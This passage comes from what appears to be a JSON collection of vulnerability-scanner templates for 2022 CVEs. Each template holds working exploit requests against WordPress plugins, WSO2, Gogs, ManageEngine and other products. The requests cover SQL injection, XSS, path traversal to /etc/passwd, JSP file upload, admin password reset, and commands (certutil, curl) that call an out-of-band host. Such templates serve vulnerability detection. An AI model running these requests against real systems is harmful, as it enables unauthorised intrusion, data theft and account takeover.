Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/doAs?=`{{url_encode(\"{{command}}\")}}`"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["19833-2202-EVC"]}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-2756","info":{"name":"Kavita <0.5.4.1 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["POST /api/account/login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n","POST /api/upload/upload-by-url HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"url\":\"http://oast.me/#.png\"}\n","GET /api/image/cover-upload?filename=coverupload_{{filename}}.png HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["Interactsh Server"]},{"type":"word","part":"header","words":["image/png"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*?)\""],"internal":true},{"type":"regex","name":"filename","group":1,"regex":["coverupload.(.*?).png"],"internal":true}]}]},{"id":"CVE-2022-2863","info":{"name":"WordPress WPvivid Backup <0.9.76 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"_ajax_nonce\":\"([0-9a-z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-47003","info":{"name":"Mura CMS <10.0.580 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45037","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname={{username_fieldname_2}}&{{username_fieldname_2}}=test-{{randstr}}&password={{randstr}}&password2=&display_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email={{randstr}}%40gmail.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["<script>alert(document.domain)</script>","SESSION_TIMEOUT"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"username_fieldname_2","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\"><img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32024","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /booking.php?car_id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0599","info":{"name":"WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id=\"><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")"],"condition":"and"},{"type":"word","part":"body","words":["id=\"mmursp_id\" value=\"\\\"><svg/onload=alert(document.domain)>\" />"]}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4320","info":{"name":"WordPress Events Calendar <1.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX\"><script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>","{{BaseURL}}/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["imgNavLeftXX\\\"><script>alert(document.cookie)</script>","<script>alert(document.cookie)</script>({});","><script>alert(document.cookie)</script>.js"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38295","info":{"name":"Cuppa CMS v1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/classes/functions.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid_field=0&name_field=\"><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["\"><script>alert(document.domain)</script>","cuppa_html"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1392","info":{"name":"WordPress Videos sync PDF <=1.7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["failed to open stream: No such file or directory","REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46071","info":{"name":"Helmet Store Showroom v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername='+OR+1%3D1+--+-&password=1234\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"Helmet Store\") && contains(body_2, \"Adminstrator Admin\")"],"condition":"and"}]}]},{"id":"CVE-2022-47966","info":{"name":"ManageEngine - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /SamlResponseServlet HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse={{url_encode(base64(SAMLResponse))}}&RelayState=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Unknown error occurred while processing your request"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-3934","info":{"name":"WordPress FlatPM <3.0.13 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\") && contains(body_2, \"Flat PM\")"],"condition":"and"}]}]},{"id":"CVE-2022-2544","info":{"name":"WordPress Ninja Job Board < 1.3.3 - Direct Request","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp/wp-content/uploads/wpjobboard/","{{BaseURL}}/wp-content/uploads/wpjobboard/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Index of /wp/wp-content/uploads/wpjobboard","Index of /wp-content/uploads/wpjobboard"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-31268","info":{"name":"Gitblit 1.9.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resources//../WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com","gitblit.properties"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31976","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_request HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0535","info":{"name":"WordPress E2Pdf <1.16.45 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_nonce={{nonce}}&e2pdf_user_email=&e2pdf_api=api.e2pdf.com&e2pdf_connection_timeout=300&e2pdf_processor=0&e2pdf_dev_update=0&e2pdf_url_format=siteurl&e2pdf_mod_rewrite=0&e2pdf_mod_rewrite_url=e2pdf%2F%25uid%25%2F&e2pdf_cache=0&e2pdf_cache=1&e2pdf_cache_fonts=0&e2pdf_cache_fonts=1&e2pdf_debug=0&e2pdf_hide_warnings=0&e2pdf_images_remote_request=0&e2pdf_images_timeout=30&e2pdf_revisions_limit=3&e2pdf_memory_time=0&e2pdf_developer=0&e2pdf_developer_ips=%3C%2Ftextarea%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&submit=Save+Changes\n","GET /wp-admin/admin.php?page=e2pdf-settings HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, 'placeholder=\\\"Developer IPs\\\" ></textarea><svg/onload=alert(document.domain)>')","contains(header_4, \"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_nonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2022-1903","info":{"name":"ARMember < 3.4.8 - Unauthenticated Admin Account Takeover","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Your Password has been reset","arm_success_msg"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39195","info":{"name":"LISTSERV 17 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-4321","info":{"name":"PDF Generator for WordPress < 1.1.2 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","pdf-generator-for-wp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/'<script>alert(document.domain);</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32025","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}%23&password={{password}}\n","GET /admin/view_car.php?id=-1%20union%20select%201,md5({{num}}),3,4,5,6,7,8,9,10--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - 